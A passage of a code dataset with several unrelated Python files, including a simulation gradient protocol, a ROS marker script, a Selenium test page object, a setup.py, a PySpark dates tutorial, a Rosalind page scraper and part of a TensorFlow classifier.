= path.join(directory, f'reference_{index}.csv')\n\n self._evaluate_reduced_potential(reference_system, trajectory,\n reference_potentials_path,\n available_resources)\n\n self.reference_potential_paths.append(reference_potentials_path)\n\n if reference_statistics is not None:\n\n subset_energies = StatisticsArray.from_pandas_csv(reference_potentials_path)\n subset_energy_corrections = (reference_statistics[ObservableType.PotentialEnergy] -\n subset_energies[ObservableType.PotentialEnergy])\n\n subset_energies[ObservableType.PotentialEnergy] = reference_statistics[ObservableType.PotentialEnergy]\n subset_energies.to_pandas_csv(reference_potentials_path)\n\n # Build the slightly perturbed system.\n reverse_system, reverse_parameter_value = self._build_reduced_system(target_force_field,\n topology,\n -self.perturbation_scale)\n\n forward_system, forward_parameter_value = self._build_reduced_system(target_force_field,\n topology,\n self.perturbation_scale)\n\n self.reverse_parameter_value = openmm_quantity_to_pint(reverse_parameter_value)\n self.forward_parameter_value = openmm_quantity_to_pint(forward_parameter_value)\n\n # Calculate the reduced potentials.\n self.reverse_potentials_path = path.join(directory, 'reverse.csv')\n self.forward_potentials_path = path.join(directory, 'forward.csv')\n\n self._evaluate_reduced_potential(reverse_system, trajectory, self.reverse_potentials_path,\n available_resources, subset_energy_corrections)\n self._evaluate_reduced_potential(forward_system, trajectory, self.forward_potentials_path,\n available_resources, subset_energy_corrections)\n\n logging.info(f'Finished calculating the reduced gradient potentials.')\n\n return self._get_output_dictionary()\n\n\n@register_calculation_protocol()\nclass CentralDifferenceGradient(BaseProtocol):\n \"\"\"A protocol which employs the central diference method\n to estimate the gradient of an observable A, such that\n\n grad = (A(x-h) - A(x+h)) / (2h)\n\n Notes\n -----\n The `values` input must either be a list of unit.Quantity, a ProtocolPath to a list\n of unit.Quantity, or a list of ProtocolPath which each point to a unit.Quantity.\n \"\"\"\n\n parameter_key = protocol_input(\n docstring='The key of the parameter to differentiate with respect to.',\n type_hint=ParameterGradientKey,\n default_value=UNDEFINED\n )\n\n reverse_observable_value = protocol_input(\n docstring='The value of the observable evaluated using the parameters'\n 'perturbed in the reverse direction.',\n type_hint=typing.Union[unit.Quantity, EstimatedQuantity],\n default_value=UNDEFINED\n )\n forward_observable_value = protocol_input(\n docstring='The value of the observable evaluated using the parameters'\n 'perturbed in the forward direction.',\n type_hint=typing.Union[unit.Quantity, EstimatedQuantity],\n default_value=UNDEFINED\n )\n\n reverse_parameter_value = protocol_input(\n docstring='The value of the parameter perturbed in the reverse '\n 'direction.',\n type_hint=unit.Quantity,\n default_value=UNDEFINED\n )\n forward_parameter_value = protocol_input(\n docstring='The value of the parameter perturbed in the forward '\n 'direction.',\n type_hint=unit.Quantity,\n default_value=UNDEFINED\n )\n\n gradient = protocol_output(\n docstring='The estimated gradient',\n type_hint=ParameterGradient\n )\n\n def execute(self, directory, available_resources):\n\n if self.forward_parameter_value < self.reverse_parameter_value:\n\n return PropertyEstimatorException(f'The forward parameter value ({self.forward_parameter_value}) must '\n f'be larger than the reverse value ({self.reverse_parameter_value}).')\n\n reverse_value = self.reverse_observable_value\n forward_value = self.forward_observable_value\n\n if isinstance(reverse_value, EstimatedQuantity):\n reverse_value = reverse_value.value\n\n if isinstance(forward_value, EstimatedQuantity):\n forward_value = forward_value.value\n\n gradient = ((forward_value - reverse_value) /\n (self.forward_parameter_value - self.reverse_parameter_value))\n\n self.gradient = ParameterGradient(self.parameter_key, gradient)\n\n return self._get_output_dictionary()\n","sub_path":"propertyestimator/protocols/gradients.py","file_name":"gradients.py","file_ext":"py","file_size_in_byte":20252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"189273290","text":"#!/usr/bin/env python\n\nimport rospy\nfrom visualization_msgs.msg import Marker\n\n\ndef mark_location(x, y, mark_id):\n shape = Marker.CUBE;\n pub = rospy.Publisher('visualization_marker', Marker, queue_size=100)\n rospy.init_node('map_marker', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n \n marker = Marker()\n marker.header.frame_id = \"/map\"\n marker.header.stamp = rospy.Time.now()\n\n\n marker.ns = \"basic_shapes\"\n marker.id = mark_id\n\n\n marker.type = shape\n\n\n marker.action = Marker.ADD\n\n\n marker.pose.position.x = x\n marker.pose.position.y = y\n marker.pose.position.z = 0\n marker.pose.orientation.x = 0.0\n marker.pose.orientation.y = 0.0\n marker.pose.orientation.z = 0.0\n marker.pose.orientation.w = 1.0\n\n\n marker.scale.x = 0.5\n marker.scale.y = 0.5\n marker.scale.z = 0.5\n\n\n marker.color.r = 0.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.color.a = 1.0\n\n marker.lifetime = rospy.Duration()\n\n\n rospy.loginfo(marker)\n rate.sleep()\n while not rospy.is_shutdown():\n pub.publish(marker)\n rate.sleep()\n\n\nif __name__ == \"__main__\":\n mark_location(6, 2, 3)\n\n","sub_path":"src/map_markers/src/marker_py.py","file_name":"marker_py.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"329940314","text":"# coding: utf-8\nfrom selenium.common.exceptions import (NoSuchElementException,\n\tStaleElementReferenceException, TimeoutException)\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom page import Page\nfrom components import menu\nfrom components import header\nimport main\nimport time\nfrom selenium.webdriver.support.wait import WebDriverWait as WDW\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\n# Employer functionality: Table showing pending invitations\n\nclass InvitationsPage(Page):\n\turl_tail = 'invitations'\n\tdynamic = False\n\n\tdef load(self):\n\t\ttry:\n\t\t\tWDW(self.driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'table_toolbar')))\n\t\t\tself.load_body()\n\t\t\tself.header = header.PrivateHeader(self.driver)\n\t\t\tself.menu = menu.SideMenu(self.driver, True)\n\t\t\treturn True\n\t\texcept (NoSuchElementException, StaleElementReferenceException,\n\t\t\tIndexError, AttributeError) as e:\n\t\t\tprint('exception loading invitations page!')\n\t\t\treturn False\n\n\tdef load_body(self):\n\t\tself.empty_msg = self.try_load_empty_msg()\n\t\tself.load_toolbar()\n\t\ttime.sleep(.4)\n\t\tself.load_table()\n\n\tdef try_load_empty_msg(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_class_name('noneMessage')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef load_toolbar(self):\n\t\t# universal toolbar options\n\t\tself.toolbar = self.driver.find_element_by_class_name('table_toolbar')\n\t\tself.info_icon = self.toolbar.find_element_by_tag_name('svg')\n\t\tself.info_span = self.try_load_info_span()\n\n\t\tbg_color = self.toolbar.value_of_css_property('background-color')\n\t\tdefault_color = 'rgba(0, 0, 0'\n\t\t# default_color = 'rgba(0, 0, 0, 0.12)'\n\t\tfind_by = self.toolbar.find_elements_by_tag_name\n\t\tif default_color in bg_color:\n\t\t\t# default toolbar options\n\t\t\tself.add_button = self.toolbar.find_element_by_class_name('send_invitation')\n\t\t\t# selected toolbar options\n\t\t\tself.resend_button = None\n\t\t\tself.delete_button = None\n\t\t\tself.selected_str = None\n\t\telse:\n\t\t\t# default toolbar options\n\t\t\tself.add_button = None\n\t\t\t# selected toolbar options\n\t\t\tself.resend_button = find_by('button')[0]\n\t\t\tself.delete_button = find_by('button')[1]\n\t\t\tself.selected_str = find_by('span')[0]\n\n\tdef try_load_info_span(self):\n\t\ttry:\n\t\t\treturn self.toolbar.find_elements_by_tag_name('span')[1]\n\t\texcept (NoSuchElementException, IndexError) as e:\n\t\t\treturn None\n\n\tdef load_table(self):\n\t\t# only get table header on desktop\n\t\tif main.is_desktop():\n\t\t\tself.load_table_header()\n\t\tself.load_table_body()\n\t\tself.load_table_footer()\n\n\tdef load_table_header(self):\n\t\t# Should only get called on desktop\n\t\ttry:\n\t\t\tself.table = self.driver.find_element_by_tag_name('table')\n\t\t\tself.table_header = self.table.find_element_by_tag_name('thead')\n\t\t\tself.header_cols = self.table_header.find_elements_by_tag_name('th')\n\t\t\tself.select_all = (\n\t\t\t\tself.table_header.find_element_by_tag_name('input'))\n\t\texcept (NoSuchElementException, IndexError) as e:\n\t\t\t# No invitations (or on wrong page)\n\t\t\tself.table = None\n\t\t\tself.table_header = None\n\t\t\tself.select_all = None\n\n\tdef load_table_body(self):\n\t\tif self.table_is_empty():\n\t\t\t# No invitations (or on wrong page)\n\t\t\tself.table_body = None\n\t\t\tself.invitations = None\n\t\telif main.is_desktop():\n\t\t\t# Seems possible to think there's no 'empty_msg' when table is\n\t\t\tself.table_body = self.table.find_element_by_tag_name('tbody')\n\t\t\tself.invitations = self.table_body.find_elements_by_tag_name('tr')\n\t\telse:\n\t\t\tself.table_body = None\n\t\t\tself.invitations = self.driver.find_elements_by_class_name('table_entry')\n\n\tdef load_table_footer(self):\n\t\tself.table_footer = self.try_load_footer()\n\t\tif self.has_footer():\n\t\t\tself.footer_buttons = self.try_load_footer_buttons()\n\t\t\tself.first_page_button = self.try_load_first_page_but()\n\t\t\tself.last_page_button = self.try_load_last_page_but()\n\n\tdef try_load_footer(self):\n\t\ttry:\n\t\t\treturn self.driver.find_element_by_id('table_footer')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_footer_buttons(self):\n\t\ttry:\n\t\t\treturn self.table_footer.find_elements_by_tag_name('button')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_first_page_but(self):\n\t\ttry:\n\t\t\treturn self.table_footer.find_element_by_class_name('first_page')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n\tdef try_load_last_page_but(self):\n\t\ttry:\n\t\t\treturn self.table_footer.find_element_by_class_name('last_page')\n\t\texcept NoSuchElementException:\n\t\t\treturn None\n\n###################### General table info ###############################\n\n\tdef table_is_empty(self):\n\t\treturn self.empty_msg is not None\n\n\tdef is_info_showing(self):\n\t\t\"\"\"Is information span showing?\"\"\"\n\t\treturn True if (self.info_span is not None) else False\n\n\tdef num_invitations(self):\n\t\tif self.invitations is not None:\n\t\t\treturn len(self.invitations)\n\n\tdef table_state(self):\n\t\tbg_color = self.toolbar.value_of_css_property('background-color')\n\t\tselected_color = 'rgba(56, 217, 244'\n\t\t# color returned by browser can vary. Don't check for exact match\n\t\tif selected_color in bg_color:\n\t\t\t# table has at least 1 invitation selected\n\t\t\treturn 'selected'\n\t\treturn 'default'\n\n\tdef all_selected(self):\n\t\treturn self.select_all.is_selected()\n\n\tdef get_num_selected(self):\n\t\t\"\"\"Return # of selected invitations according to self.selected_str\"\"\"\n\t\tif self.table_state() == 'selected':\n\t\t\treturn self.selected_str[:-9] # 2 selected\n\t\treturn 0\n\n\tdef get_mobile_row_index(self, row_index):\n\t # Want to ignore text at beginning of each 'table_entry_row'\n\t # Given row_index, return starting index for each row\n\n\t # name, employee id, phone number, email, date invited\n\t indexes = [6, 13, 14, 7, 14]\n\t return indexes[row_index]\n\n\tdef get_invitation_info(self, table_entry):\n\t \"\"\"Given invitation entry parse out info\"\"\"\n\t el_input = table_entry.find_element_by_tag_name('input')\n\t if main.is_desktop():\n\t # DESKTOP: get info out of each column\n\t tds = table_entry.find_elements_by_tag_name('td')\n\t info = {\n\t 'selected': el_input.is_selected(),\n\t 'name': tds[1].text,\n\t 'id': tds[2].text,\n\t 'phone': tds[3].text,\n\t 'email': tds[4].text,\n\t 'date': tds[5].text\n\t }\n\t else:\n\t # MOBILE: get info out of each row\n\t rows = table_entry.find_elements_by_class_name('table_entry_row')\n\n\t info = {\n\t 'selected': el_input.is_selected(),\n\t 'name': rows[0].text[6:],\n\t 'id': rows[1].text[13:],\n\t 'phone': rows[2].text[14:],\n\t 'email': rows[3].text[7:],\n\t 'date': rows[4].text[14:]\n\t }\n\t # print(str(info))\n\t return info\n\n\tdef get_table_entry(self, find_by, identifier):\n\t # find_by: 'index' or name of column header\n\t # identifier: index of invitation or string we try to match in col[find_by]\n\t if self.empty_msg is None:\n\t table_entry = None\n\t if find_by == 'index':\n\t return self.invitations[identifier]\n\t elif main.is_desktop():\n\t # Given find_by, get right column.\n\t # Return entry w/ data in col that matches identifier\n\t column_index = self.get_column_index(find_by)\n\t for i, invitation in enumerate(self.invitations):\n\t tds = invitation.find_elements_by_tag_name('td')\n\t if tds[column_index].text == identifier:\n\t table_entry = self.invitations[i]\n\t else:\n\t # Given find_by, get right row.\n\t # Return entry w/ data in row that matches identifier\n\t row_index = self.get_row_index(find_by)\n\t for i, invitation in enumerate(self.invitations):\n\t rows = invitation.find_elements_by_class_name('table_entry_row')\n\t index = self.get_mobile_row_index(row_index)\n\t if rows[row_index].text[index:].lower() == identifier.lower():\n\t table_entry = self.invitations[i]\n\n\t if table_entry is not None:\n\t return table_entry\n\t return None # no invitations or couldn't find w/ given info\n\n\tdef get_column_index(self, column_text):\n\t # Desktop: return index of column that matches given text\n\t for i, column in enumerate(self.header_cols):\n\t if column_text.lower() == column.text.lower():\n\t return i\n\t msg = str(column_text) + \" is not a column header (Invitations)\"\n\t raise Exception(msg)\n\n\tdef get_row_index(self, row_text):\n\t # Mobile: return index of row that matches given text\n\t rows = ['name', 'employee id', 'phone number', 'email', 'date invited']\n\t for i, row in enumerate(rows):\n\t if row_text.lower() == rows[i].lower():\n\t return i\n\t msg = str(row_text) + \" is not a row header (Invitations)\"\n\t raise Exception(msg)\n\n\tdef get_invitation(self, find_by, identifier, info=True):\n\t invitation = self.get_table_entry(find_by, identifier)\n\t if invitation is not None and info:\n\t return self.get_invitation_info(invitation)\n\t return invitation\n\n\tdef click_invitation(self, find_by, identifier):\n\t \tinvitation = self.get_table_entry(find_by, identifier)\n\t \tif(main.is_desktop() is False):\n\t \t\trow = invitation.find_element_by_class_name('table_entry_row')\n\t \telse:\n\t \t\trow = invitation.find_elements_by_tag_name('td')[1]\n\n\t \tself.move_to_el(row)\n\t \t# should be on invitationCard\n\n\n\t############################# Functionality #################################\n\n\tdef toggle_info(self):\n\t\tself.info_icon.click()\n\t\ttime.sleep(.4)\n\t\tself.load()\n\n\tdef toggle_all(self):\n\t\tself.select_all.click()\n\t\tself.load()\n\n\tdef toggle_invitation(self, find_by='index', identifier=0):\n\t\tself.click_toast()\n\t\tinvitation = self.get_table_entry(find_by, identifier)\n\t\tif invitation is not None:\n\t\t\tcheckbox = invitation.find_element_by_tag_name('input')\n\t\t\tif not checkbox.is_selected():\n\t\t\t\tself.move_to_el(checkbox)\n\t\t\t\treturn self.load()\n\t\telse:\n\t\t\tprint('failed to find invitation by ' + str(find_by) + ', ' + str(identifier))\n\t\t\treturn False\n\n\tdef resend_invitations(self):\n\t\t# resend currently selected invitations\n\t\tif self.table_state() == 'selected':\n\t\t\tself.scroll_to_top()\n\t\t\tself.resend_button.click()\n\t\t\ttry:\n\t\t\t\tWDW(self.driver, 3).until(\n\t\t\t\t\tEC.presence_of_element_located((By.CLASS_NAME, 'snackbar')))\n\t\t\texcept TimeoutException:\n\t\t\t\traise Exception(\"Resent invitations but could not find snackbar\")\n\t\t\treturn self.load()\n\t\treturn False\n\n\tdef resend_all_invitations(self):\n\t\t# resend all invitations\n\t\tif not self.all_selected():\n\t\t\tself.toggle_all()\n\t\treturn self.resend_invitations()\n\n\tdef delete_invitations(self):\n\t\t# delete currently selected invitations\n\t\tif self.table_state() == 'selected':\n\t\t\tself.scroll_to_top()\n\t\t\tself.delete_button.click()\n\t\t\ttime.sleep(.4)\n\t\t\treturn self.load()\n\t\treturn False\n\n\tdef delete_all_invitations(self):\n\t\t# delete all invitations\n\t\tif not self.all_selected():\n\t\t\tself.toggle_all()\n\t\treturn self.delete_invitations()\n\n\tdef add_invitation(self):\n\t\tif self.table_state() == 'default':\n\t\t\tself.add_button.click()\n\n############################### Toast Functions ###############################\n\n\tdef get_secret_urls(self):\n\t\tWDW(self.driver, 10).until(EC.presence_of_element_located((By.ID, 'testSnackId')))\n\t\t#time.sleep(1)\n\t\tself.load()\n\t\telem = self.driver.find_elements_by_class_name(\"sm-secret-code\")\n\t\ttry:\n\t\t\temail_string = elem[0].text\n\t\t\ttry:\n\t\t\t\temail_url = email_string[0:email_string.index(' => ')]\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\t\temail = email_string[email_string.index('email:') + 6:]\n\t\texcept NoSuchElementException:\n\t\t\temail = None\n\t\t\temail_url = None\n\t\ttry:\n\t\t\tphone_string = elem[1].text\n\t\t\tphone = phone_string[phone_string.index('phone:') + 6:]\n\t\t\tphone_url = phone_string[0:phone_string.index(' => ')]\n\t\texcept IndexError:\n\t\t\tphone = None\n\t\t\tphone_url = None\n\t\treturn {'email': email, 'phone': phone, 'email_url': email_url,\n\t\t\t'phone_url': phone_url}\n\n\tdef click_toast(self):\n\t\tif self.has_toast():\n\t\t\tself.toast.click()\n\t\t\ttime.sleep(.4)\n\n\tdef has_toast(self):\n\t\t# is toast visible on page?\n\t\ttry:\n\t\t\tself.toast = self.driver.find_element_by_id('testSnackId')\n\t\t\treturn True\n\t\texcept NoSuchElementException:\n\t\t\treturn False\n\n\t############################### Footer Functions ##############################\n\n\tdef has_footer(self):\n\t\treturn self.table_footer is not None\n\n\tdef num_footer_buttons(self):\n\t\tif self.has_footer():\n\t\t\treturn len(self.footer_buttons())\n\n\tdef index_of_current_page(self):\n\t\t# return index of disabled footer button\n\t\tif self.has_footer():\n\t\t\tfor i, button in enumerate(self.footer_buttons):\n\t\t\t\tif not button.is_enabled():\n\t\t\t\t\treturn i\n\n\tdef current_page(self):\n\t\tif self.has_footer():\n\t\t\tcur_index = self.index_of_current_page()\n\t\t\treturn int(self.footer_buttons[cur_index].text)\n\t\telse:\n\t\t\treturn 1\n\n\tdef go_to_page(self, page):\n\t\t# Go to 'first', 'last', or {int} page. Return whether reloading page\n\t\tif self.has_footer():\n\t\t\tnew_page = True\n\t\t\tif type(page) is int and page != self.current_page():\n\t\t\t\tnew_page = self.go_to_page_number(page)\n\t\t\telif page == 'first' and self.first_page_button is not None:\n\t\t\t\tself.scroll_to_bottom()\n\t\t\t\tself.first_page_button.click()\n\t\t\telif page == 'last' and self.last_page_button is not None:\n\t\t\t\tself.scroll_to_bottom()\n\t\t\t\tself.last_page_button.click()\n\t\t\telse:\n\t\t\t\tnew_page = False\n\t\t\tif new_page:\n\t\t\t time.sleep(1)\n\t\t\t return self.load()\n\t\treturn False\n\n\tdef go_to_page_number(self, page):\n\t\t# Given page#, return whether possible to go to new page or not\n\n\t\t# Can navigate to First/Last by passing in int(page) of first/last page\n\t\tfor i, button in enumerate(self.footer_buttons):\n\t\t\ttext = button.text\n\t\t\tif text == str(page):\n\t\t\t\tself.scroll_to_bottom()\n\t\t\t\tbutton.click()\n\t\t\t\ttime.sleep(1)\n\t\t\t\treturn self.load()\n\t\treturn False\n\n\tdef next_page(self):\n\t\t# Go to next page and reload. Return False if on last page\n\t\tcurrent_index = self.index_of_current_page()\n\t\t# raw_input('current_index: ' + str(current_index))\n\t\tlast_index = len(self.footer_buttons) - 1\n\t\t# raw_input('last_index: ' + str(last_index))\n\t\tif current_index < last_index:\n\t\t\tself.scroll_to_bottom()\n\t\t\tself.footer_buttons[current_index + 1].click()\n\t\t\ttime.sleep(1)\n\t\t\treturn self.load()\n\t\treturn False\n\n\tdef previous_page(self):\n\t\t# Go to previous page and reload. Return false if on 1st page\n\t\tcurrent_index = self.index_of_current_page()\n\t\tif current_index != 0:\n\t\t\tself.scroll_to_bottom()\n\t\t\tself.footer_buttons[current_index - 1].click()\n\t\t\ttime.sleep(1)\n\t\t\treturn self.load()\n\t\treturn False\n","sub_path":"testing/pages/invitations.py","file_name":"invitations.py","file_ext":"py","file_size_in_byte":14218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305006136","text":"\"\"\"Setuptools package definition\"\"\"\n\nfrom setuptools import setup\n\n\nwith open('README.rst', 'r') as f:\n README_TEXT = f.read()\n\nsetup(\n name = \"finja\",\n version = \"1.0.4\",\n py_modules = [\"finja\"],\n entry_points = {\n 'console_scripts': [\n \"finja=finja:main\",\n \"finjacol=finja:col_main\",\n \"finjadup=finja:dup_main\"\n ]\n },\n install_requires = [\n \"binaryornot\",\n \"six\",\n \"chardet\",\n \"argparse\",\n ],\n author = \"David Vogt, Jean-Louis Fuchs\",\n author_email = \"dv@winged.ch, ganwell@fangorn.ch\",\n description = (\n \"Index stuff and find it fast and without bloat\"\n ),\n long_description = README_TEXT,\n keywords = \"code index find text open\",\n url = \"https://ganwell.github.io\",\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: \"\n \"GNU Affero General Public License v3\",\n \"Natural Language :: English\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.5\",\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"13839293","text":"\n# coding: utf-8\n\n# # Dates and Timestamps\n# \n# You will often find yourself working with Time and Date information,\n# let's walk through some ways you can deal with it!\n\nfrom pyspark.sql import SparkSession\nspark = SparkSession.builder.appName(\"dates\").getOrCreate()\n\ndf = spark.read.csv(\"appl_stock.csv\", header=True, inferSchema=True)\n\n\n# Let's walk through how to grab parts of the timestamp data\nfrom pyspark.sql.functions import format_number, dayofmonth, hour, dayofyear, \\\n month, year, weekofyear, date_format\n\n# Extract day of month of timestamp\ndf.select(dayofmonth(df['Date'])).show()\n\n# Extract (..) of timestamp\ndf.select(hour(df['Date'])).show()\n\n# Extract (..) of timestamp\ndf.select(dayofyear(df['Date'])).show()\n\n# Extract (..) of timestamp\ndf.select(month(df['Date'])).show()\n\n\n# So for example, let's say we wanted to know the average closing price per year.\n# Easy! With a groupby and the year() function call:\n\ndf.select(year(df['Date'])).show()\n\n\ndf.withColumn(\"Year\",year(df['Date'])).show()\n\n\nnewdf = df.withColumn(\"Year\",year(df['Date']))\nnewdf.groupBy(\"Year\").mean()[['avg(Year)', 'avg(Close)']].show()\n\n\n# Still not quite presentable! Let's use the .alias method as well as round() to clean this up!\n\nresult = newdf.groupBy(\"Year\").mean()[['avg(Year)','avg(Close)']]\nresult = result.withColumnRenamed(\"avg(Year)\", \"Year\")\nresult = result.select('Year',format_number('avg(Close)',2).alias(\"Mean Close\")).show()\n\n\n\n","sub_path":"04_b_data/udemy/pyspark_portilla/1_Spark_DataFrames/5_Dates_and_Timestamps.py","file_name":"5_Dates_and_Timestamps.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"510579204","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport re\n\"\"\"\nYou should run this script from the project root.\nBecause I'm lazy, this script won't create the appropriate folders for you.\nTherefore, ensure that you have the following filestructure:\n$ROOT \n-- website\n -- problems\n\n(The required filestructure may change if the website is updated)\n\"\"\"\n\n\nlist_view = urllib.request.urlopen('http://rosalind.info/problems/list-view/').read()\nlist_view_soup = BeautifulSoup(list_view, \"html.parser\")\n\nfname = 'website/index.html'\nf = open(fname, 'w+')\n\nr = BeautifulSoup(re.sub('/problems/(.*)/', './problems/\\\\1.html', list_view_soup.prettify()), \"html.parser\")\nf.write(r.prettify())\n\naccessible_problems = list_view_soup.find_all(\"a\", class_=\"accessible\")\ninaccessible_problems = list_view_soup.find_all(\"a\", class_=\"not-accessible\")\n\nproblem_links = [p[\"href\"] for p in inaccessible_problems + accessible_problems] # they look like /problems/\n\nproblems = []\nfor link in problem_links:\n source = BeautifulSoup(urllib.request.urlopen(f'http://rosalind.info{link}').read(), \"html.parser\")\n problems.append({ \"link\": link, \"source\": source })\n\nfor p in problems:\n fname = p[\"link\"].split('/')[2] + '.html'\n f = open(f'website/problems/{fname}', 'w+')\n f.write(p[\"source\"].prettify())\n f.close()\n\n","sub_path":"bin/scrape_rosalind.py","file_name":"scrape_rosalind.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"629634099","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport sys\r\n\r\n\r\nclass Classifier():\r\n \"\"\"Fully Connected Neural Network that uses stochastic gradient descent to minimize a softmax cross entropy objective function with an Adam optimization routine\r\n\r\n Parameters\r\n ----------\r\n n_features: int\r\n number of features each sample has\r\n n_classes: int\r\n number of unique classes present in target set\r\n eta: float\r\n learning rate\r\n n_epochs: int\r\n number of epochs\r\n random_state: int\r\n seed used for random number generator\r\n build: dict\r\n dictionary specifiying the architecture of the model. n_layers refers to the number of layers, n_units refers to the number of units in each layer and activation_fn refers to the\r\n activation function to be used in each respective layer. Note that both the n_units and activation_fn must be passed as an iterator, and must appear in the desired order of construction\r\n\r\n \"\"\"\r\n\r\n def __init__(self, n_features, n_classes, eta=0.01, n_epochs=100, random_state=1, build={'n_layers': 2, 'n_units': [50, 50], 'activation_fn': [tf.nn.relu, tf.nn.relu]}):\r\n\r\n self.eta = eta\r\n self.n_epochs = n_epochs\r\n self.random_state = random_state\r\n\r\n g = tf.Graph()\r\n\r\n # the graph is then built using the models 'build' method\r\n\r\n with g.as_default():\r\n\r\n tf.set_random_seed(self.random_state)\r\n\r\n self.build(n_features, n_classes, build, one_hot=False)\r\n\r\n self.init_op = tf.global_variables_initializer()\r\n\r\n self.sess = tf.Session(graph=g)\r\n\r\n def fc_layer(self, name, input_tensor, n_units, activation_fn=None):\r\n \"\"\"Function that returns a fully connected node\r\n\r\n Parameters\r\n ---------\r\n name: str\r\n name to be used for the scope/layer\r\n input_tensor: tensor-object\r\n the tensor that is passed into the layer\r\n n_units: int\r\n number of units present in layer\r\n activation_fn: function-object\r\n activation function ot be used for the layer\r\n\r\n Returns\r\n -------\r\n layer: tensor-object\r\n the function returns the evaluated tensor\r\n\r\n \"\"\"\r\n\r\n with tf.variable_scope(name):\r\n\r\n input_shape = input_tensor.get_shape().as_list()\r\n\r\n weight_shape = (input_shape[1], n_units)\r\n\r\n weight = tf.get_variable(name='weight', shape=weight_shape)\r\n biases = tf.get_variable(name='bias', initializer=tf.zeros(shape=weight_shape[1]))\r\n\r\n layer = tf.matmul(input_tensor, weight, name='net_input')\r\n layer = tf.nn.bias_add(layer, biases)\r\n\r\n if activation_fn is not None:\r\n return activation_fn(layer)\r\n else:\r\n return layer\r\n\r\n def build(self, n_features, n_classes, build, one_hot):\r\n \"\"\"Function used to construct the graph. Note that the model uses a softmax cross entropy function as the objective function, and an Adam optimization routine to minimize the\r\n the objective function\r\n\r\n Parameters\r\n ----------\r\n n_features: int\r\n number of features\r\n n_classes: int\r\n number of unique classes present in target set\r\n build: dict\r\n dictionary specifiying the architecture of the model. n_layers refers to the number of layers, n_units refers to the number of units in each layer and activation_fn refers to the\r\n activation function to be used in each respective layer. Note that both the n_units and activation_fn must be passed as an iterator, and must appear in the desired order of construction\r\n one_hot: boolean\r\n if set to True, the target input is one hot encoded\r\n\r\n \"\"\"\r\n\r\n tf_x = tf.placeholder(tf.float32, shape=(\r\n None, n_features), name='tf_x')\r\n tf_y = tf.placeholder(tf.int32, shape=(None), name='tf_y')\r\n\r\n if one_hot:\r\n tf_y_onehot = tf.one_hot(\r\n indices=tf_y, depth=n_classes, name='tf_y_onehot')\r\n\r\n keep_proba = tf.placeholder(tf.float32, name='keep_proba')\r\n\r\n layers = {'h0': tf_x}\r\n\r\n for i in range(build['n_layers']):\r\n\r\n name = 'h{}'.format(i + 1)\r\n\r\n layers[name] = self.fc_layer(name=name, input_tensor=layers['h{}'.format(\r\n i)], n_units=build['n_units'][i], activation_fn=build['activation_fn'][i])\r\n\r\n layers[name] = tf.nn.dropout(layers[name], keep_proba)\r\n\r\n output = self.fc_layer(\r\n name='output', input_tensor=layers[name], n_units=n_classes, activation_fn=None)\r\n\r\n y_pred = {'probabilities': tf.nn.softmax(output, name='probabilities'), 'labels': tf.cast(\r\n tf.argmax(output, axis=1), tf.int64, name='labels')}\r\n\r\n correct_predictions = tf.equal(y_pred['labels'], tf.argmax(tf_y, axis=1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32), name='accuracy')\r\n\r\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(\r\n logits=output, labels=tf_y), name='cost')\r\n\r\n\r\n train_op = tf.train.AdamOptimizer(\r\n learning_rate=self.eta).minimize(cost, name='train_op')\r\n\r\n\r\n def fit(self, train_set, valid_set=None, batch_size=64):\r\n \"\"\"Function used to train the model. Note that, for the spefici problem the model was built for, the log loss was used as a metric. This is not neccesary for the model in general\r\n and hence can be removed if prefered.\r\n\r\n Parameters\r\n ----------\r\n train_set: tuple\r\n tuple containing training set in form (data_train, target_train)\r\n valid_set: tuple\r\n tuple containing validation set in form (data_validation, target_validation)\r\n batch_size: int\r\n size of batches to be used in stochastic gradient descent algorithm\r\n \"\"\"\r\n\r\n self.sess.run(self.init_op)\r\n\r\n self.training_cost, self.validation_cost = [], []\r\n self.training_accuracy, self.validation_accuracy = [], []\r\n\r\n if valid_set is None:\r\n valid_acc = None\r\n\r\n for epoch in range(1, self.n_epochs + 1):\r\n\r\n data_batch = self.batch_generator(data=train_set, batch_size=batch_size, shuffle=True)\r\n\r\n bar = ProgressBar(iter_count=train_set[0].shape[0], batch_size=batch_size)\r\n\r\n for batch_x, batch_y in data_batch:\r\n\r\n bar.update()\r\n\r\n feed = {'tf_x:0': batch_x, 